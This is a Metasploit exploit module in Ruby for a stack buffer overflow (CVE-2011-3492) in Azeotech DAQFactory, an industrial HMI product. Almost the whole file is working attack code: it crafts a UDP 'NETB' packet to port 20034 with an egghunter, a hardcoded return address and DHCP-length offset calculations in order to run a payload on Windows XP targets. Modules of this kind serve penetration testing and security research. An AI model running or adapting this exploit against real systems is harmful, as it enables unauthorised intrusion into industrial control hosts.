DaqFactory HMI NETB Request Overflow

`##  
# $Id: daq_factory_bof.rb 13756 2011-09-19 11:38:49Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Udp  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'DaqFactory HMI NETB Request Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in Azeotech's DaqFactory  
product. The specfic vulnerability is triggered when sending a specially crafted  
'NETB' request to port 20034. Exploitation of this vulnerability may take a few  
seconds due to the use of egghunter. This vulnerability was one of the 14  
releases discovered by researcher Luigi Auriemma.  
},  
'Author' =>  
[  
'Luigi Auriemma', # Initial discovery, crash poc  
'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit  
],  
  
'Version' => '$Revision: 13756 $',  
'References' =>  
[  
[ 'CVE', '2011-3492'],  
[ 'OSVDB', '75496'],  
[ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Payload' =>  
{  
'Space' => 600,  
'BadChars' => "\x00",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',  
{  
'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll  
'Offset' => 636,  
}  
],  
],  
'DisclosureDate' => 'Sep 13 2011',  
'DefaultTarget' => 0))  
  
register_options(  
[  
# Required for EIP offset  
OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),  
Opt::RPORT(20034)  
], self.class)  
end  
  
def exploit  
connect_udp  
  
print_status("Trying target #{target.name}...")  
  
eggoptions ={  
:checksum => false,  
:eggtag => 'scar',  
}  
  
# Correct the offset according to the 2nd IP (DHCP) length  
iplen = datastore['DHCP'].length  
  
if iplen == 15  
offset = 78  
elsif iplen == 14  
offset = 79  
elsif iplen == 13  
offset = 80  
elsif iplen == 12  
offset = 81  
elsif iplen == 11  
offset = 82  
elsif iplen == 10  
offset = 83  
elsif iplen == 9  
offset = 84  
elsif iplen == 8  
offset = 85  
elsif iplen == 7  
offset = 86  
elsif iplen == 6  
offset = 87  
# attack class A ip, slightly unlikly, but just in case.  
elsif iplen == 5  
offset = 88   
end   
  
if offset >= 80  
pktoffset = offset - 80  
finaloffset = target['Offset']-pktoffset  
elsif offset <= 79  
pktoffset = 80 - offset  
finaloffset = target['Offset']+pktoffset  
end  
  
# springboard onto our unmodified payload  
p = Rex::Arch::X86.jmp(750) + payload.encoded  
hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)  
  
sploit = "NETB" # NETB request overflow  
sploit << rand_text_alpha_upper(233)  
sploit << "\x00" # part of the packet structure  
sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address  
sploit << make_nops(2)  
sploit << hunter  
sploit << rand_text_alpha_upper(52-hunter.length-2)  
sploit << [target.ret].pack("V")  
sploit << rand_text_alpha_upper(12)  
sploit << Rex::Arch::X86.jmp_short(-70)  
sploit << egg  
# packetlen needs to be adjusted to a max of 0x400 as per advisory  
sploit << rand_text_alpha_upper(finaloffset-egg.length)  
  
# The use of rand_text_alpha_upper() ensures we always get the same length for the  
# first IP address. See the following for more details:  
# http://dev.metasploit.com/redmine/issues/5453  
sploit[12,4] = rand_text_alpha_upper(4)  
  
udp_sock.put(sploit)  
  
handler  
disconnect_udp  
end  
  
end  
`